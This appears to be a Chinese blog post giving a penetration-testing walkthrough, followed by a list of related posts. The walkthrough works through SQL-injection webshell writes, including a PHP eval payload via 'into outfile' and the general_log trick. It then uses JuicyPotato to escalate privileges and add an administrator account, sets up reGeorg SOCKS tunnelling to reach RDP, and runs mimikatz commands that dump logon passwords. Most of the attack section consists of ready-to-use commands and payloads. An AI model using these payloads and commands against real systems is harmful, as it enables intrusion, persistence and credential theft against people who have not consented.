一、SQL注入getshell

1、直接SQL语法写文件

(1)Mysql导出函数:
into outfile
into dumpfile [可以写16进制写入]
(2)1290的安全性报错:
是5.0版本之后,来禁止MySQL给本地存放数据
需要修改MySQL的配置文件写一个:secure-file-priv=来防止1290的安全性报错

(3)这里需要注意:
我们得写绝对路径,绝对路径我们可以通过让网页PHP报错出来,并且双写\来防止\被MySQL转义了

(4)最终语句:(靶场)
宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 union select 1,’<?php eval($_REQUEST[1230])?>’ into outfile ‘C:\phpStudy\WWW\lele.php’

2、日志法(需要存在堆叠注入才能写shell绕过1290):

show variables like '%general%';                                      #查看配置
set global general_log = on;                                         #开启general log模式
set global general_log_file = 'C:\\phpStudy\\WWW\\lele.php';   #设置日志目录为shell地址
select '<?php eval($_REQUEST[1230]);?>'                                 #写入shell

二、提权

1、因为不同的程序可能是不同的权限(mysql 管理员权限 后端代码可能是用户权限 redis),很看脸,不建议使用

2、利用第三方应用组件漏洞(某输入法、某文档工具提权)

3、使用系统(Windows)漏洞,最常用

(1)这时就该烂土豆上场了:
直接用菜刀、蚁剑等上传一个烂土豆,再使用模拟终端运行命令:
JuicyPotato.exe -t * -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}(标准版烂土豆)
JuicyPotato.exe -p “whoami”(魔改版烂土豆)

命令回显如上图,这时候就是系统权限了
(2)创建管理员账号:
JuicyPotato.exe -p “net user lele A1B2C3!.Qa /add” 添加账号lele
JuicyPotato.exe -p “net localgroup administrators lele /add” 添加lele账号到管理员组

(3)如果是Windows版本系统不兼容魔改版烂土豆,可以指定该系统版本的CLSID:https://github.com/ohpe/juicy-potato/tree/master/CLSID
命令如下:-c为指定系统的CLSID
JuicyPotato.exe -p “whoami” -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

三、内网穿透

1、有外网做法:你设置一台公网服务器让他找你(反向连接 反代出来) 给他上远控(TV 向日葵)

2、无外网做法:我们用socket协议来通信(重点,因为网络安全法不允许服务器有外网)

(1)直接用菜刀、蚁剑等上传一个reGeorg文件夹里和web的后端代码相同的文件(建议重命名一下)
php传tunnel.nosocket.php(更稳定)或tunnel.php
jsp传jsp
asp传asp

(2)然后浏览器再去访问该目录下的tunnel.nosocket.php,直到出现Georg says, ‘All seems fine’

(3)运行reGeorgSocksProxy.py脚本
cmd命令行输入:
python reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://afsgr16-b1ferw.aqlab.cn/tunnel.nosocket.php
这里解释一下命令:
-l是指定ip直接写本地的127就好了
-p是开启本地的一个端口来连接该服务器的3389,我开的是10086端口,端口不能被占用,建议开启前查看端口:netstat -ano
-u 指定tunnel.nosocket.php的url

注意:用py2环境打开,py2的环境需要安装urllib3库,若没安装,直接在cmd命令行下输入命令:pip install urllib3。千万别用python运行该命令会报错!

正常运行如上图

(4)使用Proxifier.exe代理socket协议

先添加一个代理规则,将远程桌面mstsc添加代理入规则

然后再设置代理服务器

win+r运行mstsc输入账号密码连接,这时候就大功告成了,连接上Proxifier.exe就会显示以下信息

域内主机可能密码相同,尝试抓密码。
四、猕猴桃抓密码

直接远程桌面复制mimikatz.exe进去,以管理员权限运行猕猴桃,使用以下两条命令抓管理员密码
privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码

内网渗透-内网穿透猕猴桃抓密码提权烂土豆提权相关推荐

  1. DaZeng:3分钟搞定内网渗透之外网访问指定域名

    内网渗透之外网访问指定域名 作用:在本地配置好之后,启动http-server服务,所有人可外网都可访问指定域名即可. 具体配置 使用钉钉内网穿透 在自己电脑上指定目录下 clone git仓库执行命 ...

  2. 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)

    http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...

  3. 内网渗透-内网代理穿透和内网横向移动

    内网代理穿透和内网横向移动 文章目录 内网代理穿透和内网横向移动 前言 内网代理穿透 nc termite(ew) ssh正向代理(A,B,C) msf设置路由和sock4代理访问内网流量 内网横向移 ...

  4. 内网渗透-内网信息收集

    内网信息收集 文章目录 内网信息收集 前言 msf模块中的信息收集 msf反弹shell后的信息收集 内网信息收集 后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们 ...

  5. 内网渗透-内网环境下的横向移动总结

    内网环境下的横向移动总结 文章目录 内网环境下的横向移动总结 前言 横向移动威胁 威胁密码安全 威胁主机安全 威胁信息安全 横向移动威胁的特点 利用psexec 利用psexec.exe工具 msf中 ...

  6. 内网渗透之内网信息收集(综合)

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...

  7. 内网渗透之内网主机信息收集

    目录 Windows信息收集 Windows账号密码 明文抓取 Mimikatz 离线读取Hash和密码明文 MSF加载bin抓取密码(VT查杀率2/59) LaZagne RDP登录凭据 mimik ...

  8. [内网渗透]—内网扫描

    nbtscan Win2012 上传nbtscan和dll程序 upload D:\内网\tools\信息收集\nbtscan\nbtscan.exe 上传后用nbtscan命令扫描内网其他网段 sh ...

  9. 内网渗透-内网信息搜集

    前言 当我们能访问到⽬标内⽹任何资源之后,我们就可以对 ⽬标内⽹进⾏更深层次的信息搜集⽐如:主机收集.IP 段搜集.端⼝开放服务.Web 资产数量.漏洞类型.接下来是一些工具的食用姿势,仅供参考. 假 ...

  10. 渗透测试实战 - 外网渗透内网穿透(超详细)

    文章目录 实验环境 Target1 - Centos7 (web服务) Target2 - Ubuntu (内网web服务) Target3 - Windows7 (客户端) 实验目的 实验步骤 测试 ...

最新文章

  1. misc高阶 攻防世界_玄幻世界(修真、仙侠、奇幻、神话)修炼体系基础模型设定。...
  2. 设计模式6大原则简述
  3. 【去重】php正则过滤字符串中多次重复出现内容为1个
  4. Python学习笔记:动态添加与删除属性与方法
  5. 3d max用不同目标做关键帧_3D动画制作流程大解析
  6. 洛谷P4556 [Vani有约会]雨天的尾巴
  7. matlab打开excel乱码,ArcGis 属性表.dbf文件使用Excel打开中文乱码的解决方法
  8. 腾讯轻量云FREEBSD11.1安装panabit cloud
  9. 使用原始武器的现代战争
  10. 2022-2027年(新版)中国大米行业营销战略与供应情况预测报告
  11. error: command ‘gcc‘ failed with exit status 1
  12. 致那些徘徊在测试界的屌丝
  13. 2018年11月总结,12月计划
  14. 学校计算机网络方案书,学校网络部活动策划书
  15. 互联网最有价值行业分析
  16. 最新 UltraEdit 24.20 注册成功经验分享
  17. 雪花css样式,css雪花动画
  18. 正弦波产生电路_文氏桥振荡
  19. 10分钟上手pythonpandas_【译】10分钟学会Pandas
  20. PHP 、Java、Python、C、C++ 特点或优点?

热门文章

  1. 好用的json在线工具
  2. 将洛奇的MML乐谱转为beep(蜂鸣器)乐谱
  3. PayPal社交游戏及移动娱乐产业的海外商机
  4. 噬菌体疗法减缓细菌耐药性进化
  5. C# http请求挂代理
  6. 1050Ti 安装CUDA、cuDNN
  7. c++ 写一个复数计算器
  8. android ppt 转图片显示不全,ppt转pdf图片显示不全怎么办
  9. lae界面开发工具入门之介绍十一--安卓系统如何编译打包?
  10. css实现跑马灯效果